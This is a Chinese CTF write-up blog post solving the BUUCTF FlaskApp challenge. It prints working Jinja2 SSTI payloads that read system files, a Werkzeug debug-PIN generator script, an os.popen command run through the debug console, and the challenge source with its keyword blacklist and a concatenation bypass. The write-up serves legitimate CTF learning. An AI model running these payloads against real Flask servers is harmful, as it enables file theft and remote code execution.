
<!DOCTYPE html><html lang="en">

<head>
  <meta charset="utf-8">
  <meta name="hexo-theme" content="https://github.com/xaoxuu/hexo-theme-stellar/tree/1.29.1" theme-name="Stellar" theme-version="1.29.1">
  
  <meta name="generator" content="Hexo 6.3.0">
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#000">
  <meta name="theme-color" content="#f9fafb">
  
  <title>buuctf刷题5 - Dr4x3zz</title>

  
    <meta name="description" content="# [GYCTF2020]FlaskApp">
<meta property="og:type" content="article">
<meta property="og:title" content="buuctf刷题5">
<meta property="og:url" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/index.html">
<meta property="og:site_name" content="Dr4x3zz">
<meta property="og:description" content="# [GYCTF2020]FlaskApp">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e1.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e2.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e3.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e4.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e5.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e6.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e7.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e8.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e9.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e20.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e10.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e11.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e12.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e13.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e14.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e15.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e16.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e17.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e18.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e19.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e21.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e22.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e23.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e24.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e25.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b1.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b2.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b4.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b3.png">
<meta property="og:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/b5.png">
<meta property="article:published_time" content="2024-04-17T11:57:08.000Z">
<meta property="article:modified_time" content="2024-04-23T12:33:24.000Z">
<meta property="article:author" content="Dr4x3zz">
<meta property="article:tag" content="buuctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://dr4x3zz.github.io/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e1.png">
  
  
  
  <meta name="keywords" content="buuctf">

  <!-- feed -->
  
    <link rel="alternate" href="/atom.xml" title="Dr4x3zz" type="application/atom+xml">
  

  <link rel="stylesheet" href="/css/main.css?v=1.29.1">

  

  

  
</head>
<body>

<div class="l_body s:aa content tech" id="start" layout="post" ><aside class="l_left"><div class="leftbar-container">


<header class="header"><div class="logo-wrap"><a class="avatar" href="/about/"><div class="bg" style="opacity:0;background-image:url(https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/rainbow64@3x.webp);"></div><img no-lazy class="avatar" src="undefined" onerror="javascript:this.classList.add('error');this.src='https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/image/2659360.svg';"></a><a class="title" href="/"><div class="main" ff="title">Dr4x3zz</div></a></div></header>

<div class="nav-area">
<div class="search-wrapper" id="search-wrapper"><form class="search-form"><a class="search-button" onclick="document.getElementById(&quot;search-input&quot;).focus();"><svg t="1705074644177" viewBox="0 0 1025 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1560" width="200" height="200"><path d="M1008.839137 935.96571L792.364903 719.491476a56.783488 56.783488 0 0 0-80.152866 0 358.53545 358.53545 0 1 1 100.857314-335.166073 362.840335 362.840335 0 0 1-3.689902 170.145468 51.248635 51.248635 0 1 0 99.217358 26.444296 462.057693 462.057693 0 1 0-158.255785 242.303546l185.930047 185.725053a51.248635 51.248635 0 0 0 72.568068 0 51.248635 51.248635 0 0 0 0-72.978056z" p-id="1561"></path><path d="M616.479587 615.969233a50.428657 50.428657 0 0 0-61.498362-5.534852 174.655348 174.655348 0 0 1-177.525271 3.484907 49.403684 49.403684 0 0 0-58.833433 6.76482l-3.074918 2.869923a49.403684 49.403684 0 0 0 8.609771 78.10292 277.767601 277.767601 0 0 0 286.992355-5.739847 49.403684 49.403684 0 0 0 8.404776-76.667958z" p-id="1562"></path></svg></a><input type="text" class="search-input" id="search-input" placeholder="Search"></form><div id="search-result"></div><div class="search-no-result">No Results!</div></div>


<nav class="menu dis-select"></nav>
</div>
<div class="widgets">


<widget class="widget-wrapper post-list"><div class="widget-header dis-select"><span class="name">Recent Update</span></div><div class="widget-body fs14"><a class="item title" href="/2024/11/03/MeiYa2022-Individual/"><span class="title">MeiYa2022-Individual</span></a><a class="item title" href="/2024/10/20/MeiYa2023-Individual/"><span class="title">MeiYa2023_Individual</span></a><a class="item title" href="/2024/01/27/buuctf%E5%88%B7%E9%A2%983/"><span class="title">buuctf刷题3</span></a><a class="item title" href="/2024/06/06/Vulnstack%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/"><span class="title">Vulnstack红日靶场</span></a><a class="item title" href="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/"><span class="title">buuctf刷题5</span></a><a class="item title" href="/2024/02/25/buuctf%E5%88%B7%E9%A2%984/"><span class="title">buuctf刷题4</span></a><a class="item title" href="/2024/02/15/hgame2024-week1-Select-Courses%E6%8A%A2%E8%AF%BE%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99%E5%AD%A6%E4%B9%A0/"><span class="title">hgame2024_week1_Select_Courses抢课脚本编写学习</span></a><a class="item title" href="/2023/04/23/%E9%B2%B2%E9%B9%8F%E6%9D%AFwp/"><span class="title">鲲鹏杯wp</span></a><a class="item title" href="/2024/01/24/buuctf%E5%88%B7%E9%A2%982/"><span class="title">buuctf刷题2</span></a><a class="item title" href="/2023/09/17/NSSCTF%E5%88%B7%E9%A2%981/"><span class="title">NSSCTF刷题1</span></a></div></widget>
</div>

</div></aside><div class="l_main" id="main">





<div class="article banner top">
  <div class="content">
    <div class="top bread-nav footnote"><div class="left"><div class="flex-row" id="breadcrumb"><a class="cap breadcrumb" href="/">Home</a>
<span class="sep"></span><a class="cap breadcrumb" href="/">Blog</a><span class="sep"></span><a class="cap breadcrumb-link" href="/categories/buuctf/">buuctf</a></div>
<div class="flex-row" id="post-meta"><span class="text created">Posted on: <time datetime="2024-04-17T11:57:08.000Z">2024-04-17</time></span><span class="sep updated"></span><span class="text updated">Updated on: <time datetime="2024-04-23T12:33:24.000Z">2024-04-23</time></span></div></div></div>
    
    <div class="bottom only-title">
      
      <div class="text-area">
        <h1 class="text title"><span>buuctf刷题5</span></h1>
        
      </div>
    </div>
    
  </div>
  </div><article class="md-text content"><h2 id="gyctf2020flaskapp"><a class="markdownIt-Anchor" href="#gyctf2020flaskapp">#</a> [GYCTF2020]FlaskApp</h2>
<span id="more"></span>
<p>提到 flask 肯定会想到 ssti，但是这类题目接触的特别少，这里存一下：ssti 详解与例题以及绕过 payload 大全 https://blog.csdn.net/weixin_54515836/article/details/113778233</p>
<p>留一个：Python 模板注入 (SSTI) 深入学习 https://xz.aliyun.com/t/6885?time__1311=n4%2BxnD0DRDyB5q053b7e0QKQY5DtKKezDcYD&amp;alichlgref=https%3A%2F%<a target="_blank" rel="noopener" href="http://2Fwww.bing.com">2Fwww.bing.com</a>%2F</p>
<p>本题点击提示 f12 可以看到 pin 这样的字眼，和 flask 结合查了一下，是和 debug 相关，简单来说就是要通过 ssti 注入的手段得到 debug 的 pin 码</p>
<p>想要拿到 pin 码必须知道：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">usrname: 就是启动这个 Flask的用户</span><br><span class="line">modname： 一般为flask.app</span><br><span class="line">getattr(app, “__name__”, app.__class__.__name__)：python该值一般为Flask 值一般不变</span><br><span class="line">getattr(mod, &#x27;file&#x27;, None)：为flask目录下的一个app.py的绝对路径</span><br><span class="line">uuid.getnode()：就是当前电脑的MAC地址，str(uuid.getnode())则是mac地址的十进制表达式</span><br><span class="line">get_machine_id() ：/etc/machine-id或者 /proc/sys/kernel/random/boot_i中的值</span><br><span class="line">假如是在win平台下读取不到上面两个文件，就去获取注册表中SOFTWARE\Microsoft\Cryptography的值，假如是Docker机，那么为 /proc/self/cgroup docker行</span><br></pre></td></tr></table></figure>
<p>输入这个 pin 码的入口在哪？随便在解码的地方输入一个非 base64 可以解码的内容就会报错，在右上角有一个小窗口，点击就可以</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e1.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e1.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>歪打正着还找到了 app.py 的绝对路径 <code>/usr/local/lib/python3.7/site-packages/flask/app.py</code></p>
<p>尝试利用 ssti 读取 app.py 的内容（三种读取方法）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; c.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;app.py&#x27;,&#x27;r&#x27;).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;&#123;&#125;.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__[&#x27;open&#x27;](&#x27;app.py&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__[&#x27;open&#x27;](&#x27;app.py&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>base64 加密，然后在解码的窗口注入</p>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e2.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e2.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>这里的内容好像不影响做题</p>
<p>读取 <code>/etc/passwd</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;&#125;.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__[&#x27;open&#x27;](&#x27;/etc/passwd&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e3.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e3.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>发现用户名是 flaskweb</p>
<p>读 /sys/class/net/eth0/address 来获得 mac 的地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;&#125;.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__[&#x27;open&#x27;](&#x27;/sys/class/net/eth0/address&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e4.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e4.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>将 fa93c2fad795 转为 10 进制得到 275512538355605</p>
<p>因为本题是 docker 环境，所以读取 <code>/proc/self/cgroup</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#123;&#125;.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__[&#x27;open&#x27;](&#x27;/proc/self/cgroup&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e5.png" class="lazyload" data-srcset="/2024/04/17/buuctf%E5%88%B7%E9%A2%985/e5.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt></p>
<p>不知道为什么别人都可以 docker 读取 id 我这就没有，记录一下做法吧，得到这个 id，就写脚本把 pin 跑出来</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> chain</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line">probably_public_bits = [</span><br><span class="line">    <span class="string">&#x27;flaskweb&#x27;</span>,<span class="comment"># username</span></span><br><span class="line">    <span class="string">&#x27;flask.app&#x27;</span>,<span class="comment"># modname</span></span><br><span class="line">    <span class="string">&#x27;Flask&#x27;</span>,<span class="comment"># getattr(app, &#x27;__name__&#x27;, getattr(app.__class__, &#x27;__name__&#x27;))</span></span><br><span class="line">    <span class="string">&#x27;/usr/local/lib/python3.7/site-packages/flask/app.py&#x27;</span> <span class="comment"># getattr(mod, &#x27;__file__&#x27;, None),</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">private_bits = [</span><br><span class="line">    <span class="string">&#x27;2485377871320&#x27;</span><span class="comment"># str(uuid.getnode()),  /sys/class/net/eth0/address</span></span><br><span class="line">    <span class="string">&#x27;31c24e0fd34a09126aa47d88e21b8b28efcce8acd630632e4e4a9baddff38757&#x27;</span>, <span class="comment"># get_machine_id(),/etc/machine-id</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">h = hashlib.md5()</span><br><span class="line"><span class="keyword">for</span> bit <span class="keyword">in</span> chain(probably_public_bits, private_bits):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(bit, <span class="built_in">str</span>):</span><br><span class="line">        bit = bit.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    h.update(bit)</span><br><span class="line">h.update(<span class="string">b&#x27;cookiesalt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cookie_name = <span class="string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="number">20</span>]</span><br><span class="line"></span><br><span class="line">num = <span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> num <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    h.update(<span class="string">b&#x27;pinsalt&#x27;</span>)</span><br><span class="line">    num = (<span class="string">&#x27;%09d&#x27;</span> % <span class="built_in">int</span>(h.hexdigest(), <span class="number">16</span>))[:<span class="number">9</span>]</span><br><span class="line"></span><br><span class="line">rv =<span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> rv <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    <span class="keyword">for</span> group_size <span class="keyword">in</span> <span class="number">5</span>, <span class="number">4</span>, <span class="number">3</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(num) % group_size == <span class="number">0</span>:</span><br><span class="line">            rv = <span class="string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">                          <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(num), group_size))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        rv = num</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(rv)</span><br></pre></td></tr></table></figure>
<p>这里直接记录一下脚本吧，然后输入 pin，进入交互式 shell，执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">os.popen(&quot;cat /this_is_the_flag.txt&quot;).read()</span><br></pre></td></tr></table></figure>
<p>读取 flag</p>
<p>因为我 docker 查不到 id，就一直找看看别人有没有这种情况，然后看到了一个佬直接绕过 waf，得到 flag，记录一下 https://sakurahack-y.github.io/2022/02/27/BUU-% E6% A8% A1% E6%9D% BF% E6% B3% A8% E5%85% A5% E4% B8%93% E9% A1% B9% E5%88% B7% E9% A2%98/</p>
<p>用上面的语句读取 app.py 整理一下得到</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask,render_template_string</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template,request,flash,redirect,url_for</span><br><span class="line"><span class="keyword">from</span> flask_wtf <span class="keyword">import</span> FlaskForm</span><br><span class="line"><span class="keyword">from</span> wtforms <span class="keyword">import</span> StringField, SubmitField</span><br><span class="line"><span class="keyword">from</span> wtforms.validators <span class="keyword">import</span> DataRequired</span><br><span class="line"><span class="keyword">from</span> flask_bootstrap <span class="keyword">import</span> Bootstrap</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"> </span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">&#x27;SECRET_KEY&#x27;</span>] = <span class="string">&#x27;s_e_c_r_e_t_k_e_y&#x27;</span></span><br><span class="line">bootstrap = Bootstrap(app)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NameForm</span>(<span class="title class_ inherited__">FlaskForm</span>):</span><br><span class="line">    text = StringField(<span class="string">&#x27;BASE64加密&#x27;</span>,validators= [DataRequired()])</span><br><span class="line">    submit = SubmitField(<span class="string">&#x27;提交&#x27;</span>)</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NameForm1</span>(<span class="title class_ inherited__">FlaskForm</span>):</span><br><span class="line">    text = StringField(<span class="string">&#x27;BASE64解密&#x27;</span>,validators= [DataRequired()])</span><br><span class="line">    submit = SubmitField(<span class="string">&#x27;提交&#x27;</span>)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">waf</span>(<span class="params"><span class="built_in">str</span></span>):</span><br><span class="line">    black_list = [<span class="string">&quot;flag&quot;</span>,<span class="string">&quot;os&quot;</span>,<span class="string">&quot;system&quot;</span>,<span class="string">&quot;popen&quot;</span>,<span class="string">&quot;import&quot;</span>,<span class="string">&quot;eval&quot;</span>,<span class="string">&quot;chr&quot;</span>,<span class="string">&quot;request&quot;</span>,</span><br><span class="line">                  <span class="string">&quot;subprocess&quot;</span>,<span class="string">&quot;commands&quot;</span>,<span class="string">&quot;socket&quot;</span>,<span class="string">&quot;hex&quot;</span>,<span class="string">&quot;base64&quot;</span>,<span class="string">&quot;*&quot;</span>,<span class="string">&quot;?&quot;</span>]</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> black_list :</span><br><span class="line">        <span class="keyword">if</span> x <span class="keyword">in</span> <span class="built_in">str</span>.lower() :</span><br><span class="line">            <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/hint&#x27;</span>,methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hint</span>():</span><br><span class="line">    txt = <span class="string">&quot;失败乃成功之母！！&quot;</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;hint.html&quot;</span>,txt = txt)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>,methods=[<span class="string">&#x27;POST&#x27;</span>,<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encode</span>():</span><br><span class="line">    <span class="keyword">if</span> request.values.get(<span class="string">&#x27;text&#x27;</span>) :</span><br><span class="line">        text = request.values.get(<span class="string">&quot;text&quot;</span>)</span><br><span class="line">        text_decode = base64.b64encode(text.encode())</span><br><span class="line">        tmp = <span class="string">&quot;结果  :&#123;0&#125;&quot;</span>.<span class="built_in">format</span>(<span class="built_in">str</span>(text_decode.decode()))</span><br><span class="line">        res =  render_template_string(tmp)</span><br><span class="line">        flash(tmp)</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;encode&#x27;</span>))</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">else</span> :</span><br><span class="line">        text = <span class="string">&quot;&quot;</span></span><br><span class="line">        form = NameForm(text)</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>,form = form ,method = <span class="string">&quot;加密&quot;</span> ,img = <span class="string">&quot;flask.png&quot;</span>)</span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/decode&#x27;</span>,methods=[<span class="string">&#x27;POST&#x27;</span>,<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decode</span>():</span><br><span class="line">    <span class="keyword">if</span> request.values.get(<span class="string">&#x27;text&#x27;</span>) :</span><br><span class="line">        text = request.values.get(<span class="string">&quot;text&quot;</span>)</span><br><span class="line">        text_decode = base64.b64decode(text.encode())</span><br><span class="line">        tmp = <span class="string">&quot;结果 ： &#123;0&#125;&quot;</span>.<span class="built_in">format</span>(text_decode.decode())</span><br><span class="line">        <span class="keyword">if</span> waf(tmp) :</span><br><span class="line">            flash(<span class="string">&quot;no no no !!&quot;</span>)</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;decode&#x27;</span>))</span><br><span class="line">        res =  render_template_string(tmp)</span><br><span class="line">        flash( res )</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;decode&#x27;</span>))</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">else</span> :</span><br><span class="line">        text = <span class="string">&quot;&quot;</span></span><br><span class="line">        form = NameForm1(text)</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&quot;index.html&quot;</span>,form = form, method = <span class="string">&quot;解密&quot;</span> , img = <span class="string">&quot;flask1.png&quot;</span>)</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&lt;name&gt;&#x27;</span>,methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">not_found</span>(<span class="params">name</span>):</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&quot;404.html&quot;</span>,name = name)</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&quot;0.0.0.0&quot;</span>, port=<span class="number">5000</span>, debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>
<p>查看 waf</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">waf</span>(<span class="params"><span class="built_in">str</span></span>):</span><br><span class="line">    black_list = [<span class="string">&quot;flag&quot;</span>,<span class="string">&quot;os&quot;</span>,<span class="string">&quot;system&quot;</span>,<span class="string">&quot;popen&quot;</span>,<span class="string">&quot;import&quot;</span>,<span class="string">&quot;eval&quot;</span>,<span class="string">&quot;chr&quot;</span>,<span class="string">&quot;request&quot;</span>,</span><br><span class="line">                  <span class="string">&quot;subprocess&quot;</span>,<span class="string">&quot;commands&quot;</span>,<span class="string">&quot;socket&quot;</span>,<span class="string">&quot;hex&quot;</span>,<span class="string">&quot;base64&quot;</span>,<span class="string">&quot;*&quot;</span>,<span class="string">&quot;?&quot;</span>]</span><br></pre></td></tr></table></figure>
<p>利用 python 字符之间用 <code>+</code>  拼接绕过 waf</p>
<p>查看目录</p>
